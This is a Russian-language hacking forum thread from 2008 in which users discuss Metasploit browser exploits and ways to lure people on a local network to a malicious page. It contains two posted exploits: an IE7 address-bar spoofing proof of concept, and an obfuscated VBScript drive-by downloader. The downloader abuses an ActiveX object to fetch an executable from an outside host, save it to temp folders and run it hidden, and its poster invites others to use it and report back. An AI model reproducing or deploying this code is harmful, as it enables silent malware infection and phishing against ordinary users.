ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.01.2008, 09:40
|
|
Участник форума
Регистрация: 14.11.2007
Сообщений: 195
Провел на форуме:
1210861
Репутация:
98
|
|
Сообщение от Vorlan
мда, так ничего, вполне рабочий способ, но я больше предпочитаю работать с Metasploit Framework. Вручную, конечно некоторым сложно обновлять эксплойты, но по-моему им проще пользоваться.
я тоже предпочитаю юзать Metasploit Framework3 , но у меня только один сплоит ms06_001_wmf_setabortpro пашет по ХР sp2 , да и если в локалке шалить  , то нужно ссылку кидать а там порт 8080 , начинаются вопросы типа " а это что радио ? и что там за музон "
а это весит ресурс с заряженным icpackом , типа "порно для нашей любимой локалки " , а там уже дело чела идти на это ресурс или нет , хотя из 100% 89 зайдут 
зы а обновлять экслпоты можно через Metasploit Framework3 Online Update
|
|
|
24.02.2008, 00:45
|
|
Новичок
Регистрация: 23.02.2008
Сообщений: 1
Провел на форуме:
270817
Репутация:
0
|
|
Сообщение от Belfigor
я тоже предпочитаю юзать Metasploit Framework3 , но у меня только один сплоит ms06_001_wmf_setabortpro пашет по ХР sp2 , да и если в локалке шалить , то нужно ссылку кидать а там порт 8080 , начинаются вопросы типа " а это что радио ? и что там за музон "
а это весит ресурс с заряженным icpackом , типа "порно для нашей любимой локалки " , а там уже дело чела идти на это ресурс или нет , хотя из 100% 89 зайдут
зы а обновлять экслпоты можно через Metasploit Framework3 Online Update а не судьба поменять порт на 80 ?? 
|
|
|
|
01.03.2008, 05:29
|
|
Участник форума
Регистрация: 08.05.2007
Сообщений: 100
Провел на форуме:
454835
Репутация:
28
|
|
Belfigor открываешь msfweb,в браузер вбиваешь http://127.0.0.1.:55555,ищешь свой сплойт,а там и сам дальше разберёшься,можно какие угодно порты вписывать))
|
|
|
|
20.03.2008, 17:57
|
|
Познающий
Регистрация: 18.02.2008
Сообщений: 72
Провел на форуме:
340286
Репутация:
83
|
|
Выложите сплоит для ie7
|
|
|
|
23.03.2008, 05:21
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122
Репутация:
118
|
|
Код:
<!--
Secunia Advisory: SA22542
Release Date: 2006-10-25
Impact: Spoofing
Solution Status: Unpatched
Software: Microsoft Internet Explorer 7.x
Description:
A weakness has been discovered in Internet Explorer, which can be exploited by malicious
people to conduct phishing attacks.
The problem is that it's possible to display a popup with a somewhat spoofed address bar
where a number of special characters have been appended to the URL. This makes it possible
to only display a part of the address bar, which may trick users into performing certain
unintended actions.
Secunia has constructed a demonstration, which is available at:
http://secunia.com/internet_explorer_7_popup_address_bar_spoofing_test/
The weakness is confirmed in Internet Explorer 7 on a fully patched Windows XP SP2 system.
Solution:
Do not follow links from untrusted sources.
Provided and/or discovered by:
Discovered by an anonymous person.
-->
<script language="JavaScript">
function StartTest()
{
var padding = '';
for ( i=0 ; i<108 ; i++)
{
padding += unescape("%A0");
}
newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
newWindow.moveTo( (screen.width-325) , 0 );
newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;
document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}
StartTest()
</script>
# milw0rm.com [2006-10-26]
|
|
|
|
27.04.2008, 14:11
|
|
Новичок
Регистрация: 12.03.2008
Сообщений: 15
Провел на форуме:
15109
Репутация:
5
|
|
Да метасплоит говно! как можно вывесить у себя на тачке сервак? ето бред полный.
|
|
|
|
27.04.2008, 14:12
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287
Репутация:
4738
|
|
Сообщение от 499392599
Да метасплоит говно! как можно вывесить у себя на тачке сервак? ето бред полный.
Легко! Я вывешивал!
|
|
|
|
30.04.2008, 13:30
|
|
Участник форума
Регистрация: 27.11.2007
Сообщений: 282
Провел на форуме:
1435337
Репутация:
109
|
|
Выложите, у кого есть линк на статью о примотке нового сплойта к связке сплоитов...
|
|
|
|
30.04.2008, 14:39
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
https://forum.antichat.ru/thread58567.html
|
|
|
|
30.04.2008, 20:50
|
|
Познающий
Регистрация: 18.02.2008
Сообщений: 72
Провел на форуме:
340286
Репутация:
83
|
|
sploint под IE7
<html>
<head>
<title>IE7</title>
</head>
<body>
<script type="text/vbscript">
on error resume next
Set df = document.createElement("object")
df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36"
str="Microsoft"&"."&"XMLHTTP"
Set x = df.CreateObject(str,"")
var1="Ad"
var2="od"
var3="b."
var4="St"
var5="re"
var6="am"
str1=var1&var2&var3&var4&var5&var6
str5=str1
set S = df.createobject(str5,"")
for count = 0 to 4
S.type = 1
lnk="site.com/file.exe"
x.Open "G"&"E"&"T",lnk,0
x.Send
set F = df.createobject("Script"&"ing.FileSys"&"temObject" ,"")
if count = 0 then tmp = "c:windowstemp" else if count = 1 then tmp = "c:" else if count = 2 then tmp = "c:temp" else if count = 3 then tmp = "d:windowstemp" else if count = 4 then tmp = "d:" end if
fname1= F.BuildPath(tmp,"svacm.exe")
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
if err.number = 0 then
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"INSTALL","","open",0
exit for
else
Err.Clear
End if
next
</script>
</body>
</html>
юзаем и говорим о результатах. |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для shellz[21h]](/avatars/avatar46780.jpg?629881){kind=avatar}
Линейный вид
